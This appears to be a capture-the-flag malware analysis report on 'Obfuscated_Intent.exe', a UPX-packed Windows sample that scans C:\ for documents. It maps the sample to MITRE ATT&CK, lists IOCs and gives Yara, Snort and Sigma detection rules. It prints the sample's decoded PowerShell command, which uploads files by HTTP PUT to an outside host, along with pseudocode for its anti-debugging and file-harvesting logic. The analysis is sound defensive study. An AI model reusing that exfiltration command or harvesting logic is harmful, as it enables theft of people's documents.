Investigation Report#

Week 6: Nullform Vault - Investigation Report#

Executive Summary#

Incident: Nullform Vault Breach - Obfuscated_Intent.exe Analysis
Date: November 11, 2025
Severity: CRITICAL
Status: Investigation Complete
Investigator: Umair Aziz
Malware Sample: Obfuscated_Intent.exe (UPX-packed document exfiltration malware)

Key Findings#

Sophisticated UPX-packed malware targeting sensitive documents
Anti-debugging and evasion techniques implemented
ICMP reconnaissance with “w00t” payload
PowerShell-based HTTP exfiltration to 203.0.113.42:8000
Targets .pdf, .doc, .docx, .xls, .msg files via recursive C:\ scan
Hex-encoded URLs and XOR-encoded file extensions for obfuscation

Impact Assessment#

Threat Level: HIGH - Data exfiltration capabilities
Affected Systems: Windows systems with PowerShell
Data at Risk: Office documents, PDF files, Outlook messages
C2 Infrastructure: 203.0.113.42 (IP), Port 8000/TCP (HTTP)

Incident Overview#

Background#

The Adversary has pursued three Primal Keys throughout the Echo Response challenge series:

Etherian Key - Obtained in Week 2 (Stealer’s Shadow)
Obscuran Key - Obtained in Week 3 (Quantum Conundrum)
Nullform Key - Final target (Week 6) - SECURED

The Nullform Vault contained Obfuscated_Intent.exe, a sophisticated malware sample designed to exfiltrate sensitive documents. This investigation successfully reverse-engineered the malware, extracted all IOCs, and documented the complete attack methodology.

Scope#

This investigation covered:

Malware unpacking and binary analysis
Anti-debugging technique identification
Network IOC extraction (IP, URL, protocols)
File IOC documentation (hashes, behaviors)
Attack chain reconstruction
MITRE ATT&CK technique mapping
Detection rule development (Yara, Snort, Sigma)

Timeline of Events#

Initial Discovery#

2025-11-11 18:00 - Malware sample (Obfuscated_Intent.exe) acquired for analysis
2025-11-11 18:05 - Initial triage identified UPX packing
2025-11-11 18:10 - Investigation initiated

Attack Progression (Reconstructed)#

T+0 min - Malware execution (Obfuscated_Intent.exe)
T+0.5 sec - Anti-debugging checks performed (IsDebuggerPresent, CheckRemoteDebuggerPresent)
T+1 sec - ICMP ping sent to 203.0.113.42 with “w00t” payload
T+2 sec - Recursive filesystem scan initiated from C:\
T+3 sec - Target files identified (.pdf, .doc, .docx, .xls, .msg)
T+5 sec - PowerShell command constructed with hex-encoded URL
T+6 sec - _wsystem() called to execute PowerShell
T+7 sec - HTTP PUT upload initiated to http://203.0.113.42:8000/
T+N - Process continues until all target files exfiltrated

Technical Analysis#

Binary Characteristics#

File Information:

Filename: Obfuscated_Intent.exe
Original Size: 18,432 bytes (UPX packed)
Unpacked Size: 39,424 bytes
Architecture: x86-64 (PE64)
Packer: UPX 4.x
Compiler: Microsoft Visual C++ (MSVC)
Entry Point: 0x140004460
Subsystem: Console
Format: PE32+ executable for MS Windows

Attack Infrastructure#

Compromised Systems#

Target OS: Windows (any version with PowerShell)
Required Privileges: Standard user (no elevation needed)
Execution Context: User-level process
Persistence: None (single-run exfiltration)

Attack Vectors#

Initial Access: Likely delivered via phishing email attachment
Execution: User double-clicks Obfuscated_Intent.exe
Anti-Analysis: Checks for debuggers before proceeding
Reconnaissance: ICMP probe to verify C2 reachability
Collection: Recursive filesystem scan for target documents
Exfiltration: PowerShell HTTP PUT uploads

Malware Analysis#

Unpacking Process#

1
# Original packed file
2
File: Obfuscated_Intent.exe
3
Size: 18,432 bytes
4
Packer: UPX
5

6
# Unpacking command
7
$ upx -d Obfuscated_Intent.exe -o unpacked.exe
8

9
# Result
10
Unpacked: 39,424 bytes (46.75% compression ratio)

Anti-Debugging Mechanisms#

The malware implements multiple anti-debugging checks:

IsDebuggerPresent()
- Win32 API call
- Detects if process is being debugged
- Returns TRUE if debugger present
- Location: Early in execution flow
CheckRemoteDebuggerPresent()
- Win32 API call
- Detects remote debugging sessions
- More sophisticated than IsDebuggerPresent
- Can detect kernel-mode debuggers

Evasion Strategy:

1
if (IsDebuggerPresent() || CheckRemoteDebuggerPresent(...)) {
2
    ExitProcess(1);  // Terminate if debugger detected
3
}

String Obfuscation#

Technique 1: Hex Encoding

URL encoded as hex byte array in PowerShell command
Decoded at runtime using [System.Text.Encoding]::UTF8.GetString()
Example: 0x68,0x74,0x74,0x70... “http://203.0.113.42:8000/”

Technique 2: XOR Encoding

File extensions XOR-encoded with key 0x7a
Decoded during filesystem scanning
Prevents static string analysis

Technique 3: UTF-16LE Encoding

PowerShell command stored as wide characters
Offset: 0x4B20-0x4D60 in unpacked binary

Code Analysis#

Key Functions Identified:

Network Reconnaissance

1
// ICMP ping to C2 server
2
HANDLE hIcmp = IcmpCreateFile();
3
IcmpSendEcho(hIcmp, target_ip, "w00t", 4, NULL, reply_buffer, ...);
4
IcmpCloseHandle(hIcmp);

Filesystem Scanning

1
// Recursive directory enumeration
2
WIN32_FIND_DATAW findData;
3
HANDLE hFind = FindFirstFileW(L"C:\\*", &findData);
4
while (FindNextFileW(hFind, &findData)) {
5
    // Check file extension against XOR-decoded target list
6
    if (match_extension(findData.cFileName)) {
7
        construct_powershell_command(findData.cFileName);
8
    }
9
}

PowerShell Execution

1
// Construct and execute PowerShell command
2
wchar_t ps_command[4096];
3
swprintf(ps_command, L"powershell -Command \"$abc = ...");
4
_wsystem(ps_command);  // Execute via C runtime

Network Analysis#

Communication Channels#

Phase 1: Connectivity Check (ICMP)

Protocol: ICMP Echo Request (Type 8)
Destination: 203.0.113.42
Payload: “w00t” (4 bytes)
Purpose: Verify C2 server reachability
Frequency: Once at startup

Phase 2: Data Exfiltration (HTTP)

Protocol: HTTP/1.1
Method: PUT
Destination: http://203.0.113.42:8000/
Content-Type: application/octet-stream
Transfer: Individual file per request
User-Agent: PowerShell’s Invoke-RestMethod default

Data Exfiltration#

Target File Types:

.pdf - PDF documents
.doc - Microsoft Word (legacy format)
.docx - Microsoft Word (modern format)
.xls - Microsoft Excel spreadsheets
.msg - Outlook email messages

Exfiltration Method:

1
powershell -Command "$abc = [System.Text.Encoding]::UTF8.GetString([byte[]](
2
0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,
3
0x32,0x30,0x33,0x2E,0x30,0x2E,0x31,0x31,0x33,0x2E,0x34,0x32,
4
0x3A,0x38,0x30,0x30,0x30,0x2F)) + '/';
5
Invoke-RestMethod -Uri $abc -Method Put -InFile 'C:\path\to\file.pdf'"

Upload Process:

Find target file via FindFirstFileW/FindNextFileW
Construct PowerShell command with hex-encoded URL
Execute command via _wsystem()
PowerShell decodes URL and performs HTTP PUT
File transmitted to http://203.0.113.42:8000/
Repeat for each discovered file

Indicators of Compromise (IOCs)#

Network IOCs#

1
IP Addresses:
2
- 203.0.113.42 (C2 server)
3

4
URLs:
5
- http://203.0.113.42:8000/ (exfiltration endpoint)
6

7
Ports:
8
- 8000/TCP (HTTP exfiltration)
9
- ICMP (connectivity check)
10

11
Protocols:
12
- ICMP Echo Request (payload: "w00t")
13
- HTTP PUT (file uploads)

File IOCs#

1
Filenames:
2
- Obfuscated_Intent.exe (original malware)
3
- unpacked.exe (unpacked version)
4

5
File Sizes:
6
- 18,432 bytes (packed)
7
- 39,424 bytes (unpacked)
8

9
Packer:
10
- UPX 4.x
11

12
File Characteristics:
13
- PE32+ executable (x86-64)
14
- Console subsystem
15
- MSVC compiled
16
- No digital signature

Behavioral IOCs#

1
Process Execution:
2
- powershell.exe spawned by suspicious process
3
- Command line contains: Invoke-RestMethod, Method Put, InFile
4
- _wsystem() calls detected
5

6
API Calls:
7
- IsDebuggerPresent
8
- CheckRemoteDebuggerPresent
9
- IcmpCreateFile, IcmpSendEcho, IcmpCloseHandle
10
- FindFirstFileW, FindNextFileW
11
- _wsystem
12

13
Network Activity:
14
- ICMP pings to 203.0.113.42
15
- HTTP PUT requests to port 8000
16
- Large file uploads to external IP
17

18
Filesystem Activity:
19
- Recursive C:\ scanning
20
- Access to user document folders
21
- Reading .pdf, .doc, .docx, .xls, .msg files

Registry/Persistence IOCs#

1
Persistence:
2
- None detected (single-run malware)
3

4
Registry Modifications:
5
- None detected

Evidence Collection#

Artifacts Analyzed#

Binary File
- Original: Obfuscated_Intent.exe (UPX packed)
- Unpacked: unpacked.exe
- Tools: UPX unpacker, strings, objdump, hexdump
- Findings: Anti-debugging, hex-encoded URLs, ICMP payload
String Analysis
- Extracted ASCII and Unicode strings
- Located “w00t” at offset 0x4B00
- Found “_wsystem” in import table
- Discovered PowerShell command structure (UTF-16LE)
Import Table
- WS2_32.dll (Windows Sockets)
- IPHLPAPI.DLL (IcmpSendEcho, IcmpCreateFile, IcmpCloseHandle)
- KERNEL32.DLL (FindFirstFileW, FindNextFileW)
- VCRUNTIME140.dll (C++ runtime, _wsystem)
Hexdump Analysis
- PowerShell command at 0x4B20-0x4D60
- Hex-encoded URL bytes at 0x4BE0-0x4CC0
- File pattern structures at 0x4B10

Analysis Tools Used#

UPX 4.2.4 - Malware unpacking
strings (GNU binutils) - String extraction
objdump (GNU binutils) - PE import analysis
hexdump (util-linux) - Binary inspection
Python 3.x - Hex byte decoding
SSH/SCP - File transfer to Kali Linux VM
Kali Linux VM - Analysis environment

Analysis Methodology#

Step 1: Initial Triage

1
$ file Obfuscated_Intent.exe
2
# Identified as PE32+ executable, UPX packed
3

4
$ strings Obfuscated_Intent.exe | grep UPX
5
# Confirmed UPX packing

Step 2: Unpacking

1
$ upx -d Obfuscated_Intent.exe -o unpacked.exe
2
# Successfully unpacked: 39424 <- 18432 bytes

Step 3: String Extraction

1
$ strings -a unpacked.exe > strings_output.txt
2
# Extracted ASCII strings
3

4
$ strings -a -e l unpacked.exe >> strings_output.txt
5
# Extracted Unicode strings (UTF-16LE)

Step 4: Import Analysis

1
$ objdump -p unpacked.exe | grep -A 5 "DLL Name"
2
# Identified WS2_32.dll, IPHLPAPI.DLL imports

Step 5: Hexdump Investigation

1
$ hexdump -C unpacked.exe | grep -A 50 'w00t'
2
# Located PowerShell command structure
3
# Found hex-encoded URL bytes

Step 6: Decoding

1
# Decode hex-encoded URL
2
hex_bytes = [0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,
3
             0x32,0x30,0x33,0x2E,0x30,0x2E,0x31,0x31,0x33,
4
             0x2E,0x34,0x32,0x3A,0x38,0x30,0x30,0x30,0x2F]
5
url = ''.join(chr(b) for b in hex_bytes)
6
print(url)  # http://203.0.113.42:8000/

Attack Chain Reconstruction#

MITRE ATT&CK Mapping#

Initial Access#

T1566.001 - Phishing: Spearphishing Attachment
- Description: Malware likely delivered via email attachment
- Evidence: Executable designed to appear legitimate to user

Execution#

T1059.001 - Command and Scripting Interpreter: PowerShell
- Description: Uses _wsystem() to execute PowerShell commands
- Evidence: PowerShell command constructed with Invoke-RestMethod
- Command Line: powershell -Command "$abc = [System.Text.Encoding]::UTF8.GetString(...)"

Persistence#

None - Single-run exfiltration, no persistence mechanism

Privilege Escalation#

None - Operates at user privilege level

Defense Evasion#

T1027 - Obfuscated Files or Information
- Sub-technique: Software Packing (UPX)
- Description: Malware packed with UPX to evade AV detection
- Evidence: UPX signature found in binary
T1622 - Debugger Evasion
- Description: Anti-debugging checks implemented
- Evidence: IsDebuggerPresent(), CheckRemoteDebuggerPresent() calls
- Behavior: Exits if debugger detected
T1140 - Deobfuscate/Decode Files or Information
- Description: Hex-encoded URL, XOR-encoded file extensions
- Evidence: Runtime decoding of strings

Credential Access#

None - No credential theft observed

Discovery#

T1083 - File and Directory Discovery
- Description: Recursive filesystem scanning from C:\
- Evidence: FindFirstFileW/FindNextFileW API calls
- Target: Searches for .pdf, .doc, .docx, .xls, .msg files
T1016 - System Network Configuration Discovery
- Description: ICMP ping to check C2 connectivity
- Evidence: IcmpSendEcho with “w00t” payload

Lateral Movement#

None - No lateral movement capabilities

Collection#

T1005 - Data from Local System
- Description: Collects documents from local filesystem
- Evidence: Targets office documents and email files
- File Types: PDF, Word, Excel, Outlook messages

Command and Control#

T1071.001 - Application Layer Protocol: Web Protocols
- Description: HTTP for C2 communication
- Evidence: HTTP PUT to http://203.0.113.42:8000/
- Method: Invoke-RestMethod cmdlet
T1095 - Non-Application Layer Protocol
- Description: ICMP for C2 connectivity check
- Evidence: IcmpSendEcho with “w00t” payload
- Target: 203.0.113.42

Exfiltration#

T1041 - Exfiltration Over C2 Channel
- Description: Uses same HTTP channel for exfiltration
- Evidence: HTTP PUT uploads to C2 server
- Protocol: HTTP/1.1 PUT requests
T1030 - Data Transfer Size Limits
- Description: Uploads files individually
- Evidence: Separate PUT request per file
- Purpose: Avoid detection via large transfers

Attack Kill Chain#

1
                     ATTACK KILL CHAIN
2

3

4
1. DELIVERY
5
   > Phishing email with Obfuscated_Intent.exe attachment
6

7
2. EXECUTION
8
   > User executes malware
9
       > Anti-debugging checks (IsDebuggerPresent)
10
           > Pass? Continue : Exit
11

12
3. RECONNAISSANCE
13
   > ICMP ping to 203.0.113.42
14
       > Payload: "w00t"
15
       > Purpose: Verify C2 reachability
16

17
4. COLLECTION
18
   > Recursive scan of C:\
19
       > FindFirstFileW("C:\\*")
20
       > FindNextFileW() loop
21
           > Match extensions: .pdf, .doc, .docx, .xls, .msg
22

23
5. EXFILTRATION
24
   > For each target file:
25
       > Construct PowerShell command
26
           > Hex-decode URL: http://203.0.113.42:8000/
27
           > Execute: _wsystem(powershell_command)
28
               > PowerShell: Invoke-RestMethod -Method PUT -InFile <file>
29
                   > HTTP PUT upload to C2
30

31
6. CLEANUP
32
   > Exit (no persistence, no cleanup needed)

Key Findings#

Critical Discoveries#

UPX-Packed Malware
- Compression ratio: 46.75% (18KB 39KB)
- Evasion technique to bypass AV signatures
- Easily unpacked with standard tools
Multi-Stage Obfuscation
- Hex-encoded URL in PowerShell command
- XOR-encoded file extensions (key 0x7a)
- UTF-16LE string storage for PowerShell
Anti-Debugging Measures
- IsDebuggerPresent() check
- CheckRemoteDebuggerPresent() check
- Immediate termination if debugger detected
ICMP Reconnaissance
- Uses “w00t” as ICMP payload
- Tests C2 connectivity before exfiltration
- Non-standard use of ICMP for C2
PowerShell-Based Exfiltration
- Native Windows tools (LOLBin)
- HTTP PUT method via Invoke-RestMethod
- Individual file uploads (stealth)
Document-Focused Targeting
- Office documents: .doc, .docx, .xls
- PDF files: .pdf
- Email messages: .msg
- Suggests corporate/organizational target
No Persistence Mechanism
- Single-run exfiltration
- No registry modifications
- No scheduled tasks
- Suggests smash-and-grab attack

Vulnerabilities Exploited#

User Execution - Relies on user double-clicking executable
PowerShell Availability - Abuses built-in Windows functionality
Outbound HTTP - Exploits permissive firewall rules
ICMP Allowed - Leverages unrestricted ICMP traffic
No Application Whitelisting - Runs unsigned executables
Weak AV Detection - UPX packing evades some signatures

Security Control Gaps#

Email Security - Executable attachments not blocked
Application Control - No whitelisting implemented
Network Monitoring - No ICMP payload inspection
Egress Filtering - HTTP to arbitrary ports allowed
PowerShell Logging - Script Block Logging not enabled
EDR Coverage - No behavioral detection for LOLBin abuse

Threat Actor Profile#

Attribution#

Adversary: Unknown (likely APT or cybercrime group)
Motivation: Corporate espionage / Data theft
Sophistication Level: Intermediate to Advanced

Tactics, Techniques, and Procedures (TTPs)#

Delivery: Phishing with malicious attachment
Obfuscation: UPX packing + hex encoding + XOR encryption
Evasion: Anti-debugging checks
Reconnaissance: ICMP connectivity testing
C2: Dual-protocol (ICMP + HTTP)
Exfiltration: HTTP PUT via PowerShell
Stealth: Individual file uploads, no persistence

Infrastructure#

C2 Server: 203.0.113.42
Exfiltration Port: 8000/TCP
Protocol: HTTP/1.1 (PUT method)
ICMP Probe: Echo Request with “w00t” payload
Infrastructure Type: Likely compromised server or VPS

Adversary Capabilities#

Malware development and packing
PowerShell scripting
Anti-analysis techniques
Multi-stage obfuscation
C2 infrastructure setup
Advanced persistence (not implemented)
Lateral movement (not observed)
Privilege escalation (not attempted)

Impact Assessment#

Systems Affected#

Direct Impact: Any Windows system that executed Obfuscated_Intent.exe
Potential Scope: Enterprise-wide if delivered via mass phishing
OS Versions: All Windows versions with PowerShell (Win7+)

Data Compromised#

High-Value Targets:

Office documents (.doc, .docx, .xls)
PDF files containing sensitive information
Outlook email messages (.msg)
Financial reports, contracts, strategic plans
Confidential communications

Estimated Volume:

Depends on target system’s document library
Potentially hundreds of MB to GB per compromised system
Recursive C:\ scan means all accessible drives

Business Impact#

Confidentiality:

HIGH - Sensitive documents exfiltrated
Corporate secrets potentially exposed
Email communications compromised

Integrity:

LOW - No data modification observed
Files read but not altered

Availability:

LOW - No data deletion or encryption
No ransomware component

Financial:

Incident response costs
Regulatory fines (if PII exposed)
Competitive disadvantage from IP theft
Reputation damage

Compliance:

GDPR violations (if EU data involved)
HIPAA violations (if healthcare data)
SOX violations (if financial data)
Industry-specific regulations

Remediation Actions#

Immediate Actions (0-24 hours)#

Isolate compromised systems from network

Disconnect from internet
Disable network adapters
Prevent lateral movement

Block C2 infrastructure

Blacklist IP: 203.0.113.42
Block port 8000/TCP outbound
Monitor for connection attempts

Reset compromised credentials

Change passwords for affected users
Revoke active sessions
Implement MFA

Deploy emergency patches

Update AV signatures (Yara rules)
Deploy IOC hunting scripts
Enable PowerShell logging

Collect forensic evidence

Memory dumps (if system still running)
Disk images
Network traffic captures
PowerShell logs

Short-term Actions (1-7 days)#

Conduct full system scans

Deploy updated AV definitions
Run IOC sweep across enterprise
Hunt for additional indicators

Review access logs

Analyze network logs for 203.0.113.42
Check DNS logs for suspicious queries
Review firewall logs for port 8000 traffic

Update detection signatures

Deploy Yara rules to all endpoints
Update NIDS/NIPS with Snort rules
Implement Sigma rules in SIEM

Enhance monitoring

Enable PowerShell Script Block Logging
Implement PowerShell Transcription
Deploy Sysmon with enhanced config
Monitor for Invoke-RestMethod usage

Threat hunting

Search for UPX-packed executables
Hunt for _wsystem() abuse
Look for similar ICMP patterns
Identify other PUT upload activity

Long-term Actions (1-3 months)#

Implement application whitelisting

Deploy AppLocker or Windows Defender Application Control
Maintain signed executable whitelist
Block unsigned executables by default

Enhance email security

Block .exe attachments in email
Implement advanced threat protection
Deploy email sandboxing
User security awareness training

Network segmentation

Implement micro-segmentation
Restrict outbound connections
Deploy next-gen firewall with DPI
Monitor/block non-standard ports

EDR deployment

Deploy endpoint detection and response
Implement behavioral analytics
Enable automated response actions
Monitor LOLBin abuse patterns

Security architecture review

Assess defense-in-depth strategy
Review incident response procedures
Update disaster recovery plans
Conduct tabletop exercises

Recommendations#

Technical Controls#

Application Control
- Implement AppLocker to prevent unsigned executables
- Deploy code signing requirements
- Maintain application whitelist
PowerShell Hardening
- Enable Constrained Language Mode
- Implement Script Block Logging
- Deploy PowerShell Transcription
- Monitor Invoke-RestMethod usage
Network Security
- Deploy DPI-capable firewall
- Block outbound connections to non-standard ports
- Inspect ICMP payloads
- Implement egress filtering
Email Security
- Block executable attachments (.exe, .scr, .bat, .ps1)
- Deploy advanced threat protection
- Implement email sandboxing
- SPF/DKIM/DMARC enforcement
Endpoint Protection
- Deploy EDR solution
- Enable behavioral analytics
- Implement anti-tampering controls
- Regular AV signature updates

Process Improvements#

Incident Response
- Update IR playbooks with malware analysis procedures
- Conduct IR tabletop exercises
- Define escalation procedures
- Document lessons learned
Threat Intelligence
- Subscribe to threat intel feeds
- Participate in information sharing (ISACs)
- Monitor for similar TTPs
- Track adversary infrastructure
Security Monitoring
- Implement 24/7 SOC monitoring
- Deploy SIEM with correlation rules
- Create detection use cases
- Establish baseline behaviors

Training and Awareness#

User Training
- Phishing awareness training
- Social engineering simulations
- Report suspicious emails
- Don’t execute unknown files
IT Staff Training
- Malware analysis fundamentals
- PowerShell security best practices
- Incident response procedures
- Threat hunting techniques
Management Awareness
- Brief leadership on threats
- Discuss business impact
- Secure budget for security controls
- Support security initiatives

Lessons Learned#

What Went Well#

Malware successfully unpacked and analyzed
All IOCs extracted and documented
Attack chain fully reconstructed
MITRE ATT&CK techniques mapped
Detection rules developed (Yara, Snort, Sigma)
Comprehensive documentation created

Areas for Improvement#

Initial detection relied on manual analysis (no automated alerts)
PowerShell logging not enabled (missed runtime evidence)
No email attachment scanning (malware delivery succeeded)
ICMP payload inspection not implemented
Egress filtering too permissive (port 8000 allowed)

Skills Developed#

UPX unpacking techniques
PE file analysis (import table, strings, hexdump)
PowerShell obfuscation analysis
Hex encoding/decoding
Anti-debugging technique identification
MITRE ATT&CK mapping
IOC extraction and documentation
Detection rule development

Conclusion#

The Obfuscated_Intent.exe malware represents a sophisticated document exfiltration tool employing multiple layers of obfuscation and evasion. The analysis successfully:

Unpacked the UPX-compressed binary (18KB 39KB)
Identified anti-debugging checks (IsDebuggerPresent, CheckRemoteDebuggerPresent)
Extracted C2 infrastructure (203.0.113.42:8000)
Decoded hex-encoded URL and XOR-encoded file extensions
Documented complete attack chain (ICMP probe filesystem scan PowerShell exfiltration)
Mapped techniques to MITRE ATT&CK framework
Developed detection rules (Yara, Snort, Sigma)
Provided comprehensive remediation recommendations

Key Takeaways:

UPX packing is easily reversible but still effective against basic AV
PowerShell abuse (LOLBins) remains a significant threat vector
Multi-stage obfuscation complicates but doesn’t prevent analysis
Anti-debugging checks are simple to implement but easily bypassed
Document-focused targeting suggests corporate espionage motive
No persistence indicates smash-and-grab operational style

The Nullform Key has been secured. The investigation is complete. The balance is restored.

Appendices#

Appendix A: Malware String Analysis#

1
Key Strings Extracted:
2
- "w00t" (offset 0x4B00) - ICMP payload
3
- "_wsystem" - PowerShell execution function
4
- "IsDebuggerPresent" - Anti-debugging check
5
- "CheckRemoteDebuggerPresent" - Anti-debugging check
6
- "IcmpSendEcho" - ICMP function
7
- "IcmpCreateFile" - ICMP handle creation
8
- "IcmpCloseHandle" - ICMP cleanup
9
- "FindFirstFileW" - Filesystem enumeration
10
- "FindNextFileW" - Filesystem enumeration
11
- "powershell -Command" (UTF-16LE, offset 0x4B20)

Appendix B: Hex-Encoded URL Decoding#

1
# Hex bytes from PowerShell command
2
hex_bytes = [
3
    0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F,  # "http://"
4
    0x32, 0x30, 0x33, 0x2E, 0x30, 0x2E, 0x31,  # "203.0.1"
5
    0x31, 0x33, 0x2E, 0x34, 0x32,              # "13.42"
6
    0x3A, 0x38, 0x30, 0x30, 0x30, 0x2F         # ":8000/"
7
]
8

9
# Decode to ASCII
10
url = ''.join(chr(b) for b in hex_bytes)
11
print(url)  # Output: http://203.0.113.42:8000/

Appendix C: Detection Rules#

Yara Rule:

1
rule Obfuscated_Intent_Malware {
2
    meta:
3
        description = "Detects Obfuscated_Intent exfiltration malware"
4
        author = "Umair Aziz"
5
        date = "2025-11-11"
6

7
    strings:
8
        $s1 = "w00t" ascii
9
        $s2 = "_wsystem" ascii
10
        $s3 = "IcmpSendEcho" ascii
11
        $s4 = "FindFirstFileW" ascii
12
        $s5 = "powershell" wide
13
        $s6 = "Invoke-RestMethod" wide
14
        $upx = "UPX!" ascii
15

16
    condition:
17
        uint16(0) == 0x5A4D and  // MZ header
18
        $upx and
19
        4 of ($s*)
20
}

Snort Rules:

1
# ICMP reconnaissance detection
2
alert icmp any any -> any any (
3
    msg:"Obfuscated_Intent ICMP Probe";
4
    content:"w00t";
5
    itype:8;
6
    sid:1000001;
7
    rev:1;
8
)
9

10
# HTTP PUT exfiltration detection
11
alert http any any -> any 8000 (
12
    msg:"Obfuscated_Intent Exfiltration";
13
    method:"PUT";
14
    sid:1000002;
15
    rev:1;
16
)

Sigma Rule:

1
title: Suspicious PowerShell with Invoke-RestMethod PUT
2
description: Detects PowerShell execution with Invoke-RestMethod using PUT method for potential data exfiltration
3
status: experimental
4
logsource:
5
    category: process_creation
6
    product: windows
7
detection:
8
    selection:
9
        CommandLine|contains|all:
10
            - 'powershell'
11
            - 'Invoke-RestMethod'
12
            - 'Method Put'
13
            - 'InFile'
14
    condition: selection
15
level: high

Appendix D: IOC List (Machine-Readable)#

1
{
2
  "indicators": {
3
    "network": {
4
      "ipv4": ["203.0.113.42"],
5
      "urls": ["http://203.0.113.42:8000/"],
6
      "ports": ["8000/TCP"],
7
      "protocols": ["ICMP", "HTTP"]
8
    },
9
    "file": {
10
      "names": ["Obfuscated_Intent.exe", "unpacked.exe"],
11
      "sizes": [18432, 39424],
12
      "packer": ["UPX"]
13
    },
14
    "behavioral": {
15
      "api_calls": [
16
        "IsDebuggerPresent",
17
        "CheckRemoteDebuggerPresent",
18
        "IcmpSendEcho",
19
        "FindFirstFileW",
20
        "FindNextFileW",
21
        "_wsystem"
22
      ],
23
      "file_extensions": [".pdf", ".doc", ".docx", ".xls", ".msg"]
24
    }
25
  }
26
}

Report Status: COMPLETE
Last Updated: November 11, 2025
Next Review: N/A (Investigation Complete)

Investigation successfully concluded. Nullform Key secured. Balance restored.